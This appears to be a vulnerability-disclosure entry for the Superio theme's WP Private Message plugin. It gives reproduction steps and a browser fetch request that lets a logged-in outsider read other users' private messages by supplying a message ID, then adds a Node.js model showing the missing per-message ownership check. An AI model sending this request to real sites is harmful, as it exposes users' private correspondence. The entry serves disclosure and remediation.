## https://sploitus.com/exploit?id=WPEX-ID:F915E5AC-E216-4D1C-AEC1-C3BE11E2A6DE
- Install the Superio theme and its WP Private Message bundled plugin.
- Create a new private message in the backend.
- Log in as a different user.
- Generate a nonce for the logged-in user.
- From the browser console, run the following request, replacing the NONCE and MESSAGE_ID:

```
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=wp_private_message_choose_message&nonce=NONCE&message_id=MESSAGE_ID",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

- See the message data.
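
The check that would stop the request above, shown as an added example (a self-contained Node.js model, not the plugin's PHP code). It assumes the handler validates only the nonce; the message store, user IDs and function names are constructed for illustration.

```javascript
// Model of the AJAX endpoint's checks. All data and helper names are constructed.
const ACTION = "wp_private_message_choose_message";

// Constructed sample store: message 7 is between users 1 and 2.
const messages = new Map([
  [7, { sender: 1, recipient: 2, body: "constructed sample text" }],
]);

// A nonce here is bound to (user, action), never to a particular message.
const issued = new Map();
function issueNonce(userId, action) {
  const nonce = Math.random().toString(36).slice(2, 12);
  issued.set(`${userId}:${action}`, nonce);
  return nonce;
}
function verifyNonce(userId, action, nonce) {
  return typeof nonce === "string" && issued.get(`${userId}:${action}`) === nonce;
}

// Handler that stops at the nonce check (assumed behaviour the steps reproduce).
function chooseMessageNonceOnly(userId, params) {
  if (!verifyNonce(userId, ACTION, params.nonce)) return { status: 403 };
  const msg = messages.get(Number(params.message_id));
  return msg ? { status: 200, data: msg } : { status: 404 };
}

// Handler that also requires the caller to be a participant in the message.
function chooseMessageWithOwnership(userId, params) {
  if (!verifyNonce(userId, ACTION, params.nonce)) return { status: 403 };
  const id = Number(params.message_id);
  const msg = Number.isInteger(id) ? messages.get(id) : undefined;
  // Same response for "missing" and "not yours", so IDs cannot be enumerated.
  if (!msg || (msg.sender !== userId && msg.recipient !== userId)) {
    return { status: 404 };
  }
  return { status: 200, data: msg };
}

function demo() {
  const outsider = 3; // logged in, but not a participant in message 7
  const params = { nonce: issueNonce(outsider, ACTION), message_id: "7" };
  return {
    nonceOnly: chooseMessageNonceOnly(outsider, params).status,
    withOwnership: chooseMessageWithOwnership(outsider, params).status,
    recipient: chooseMessageWithOwnership(2, {
      nonce: issueNonce(2, ACTION), message_id: "7" }).status,
  };
}
console.log(demo());
```

A valid nonce only shows that the request came from that user's session for that action; access to a given `message_id` has to be decided by a separate per-object check.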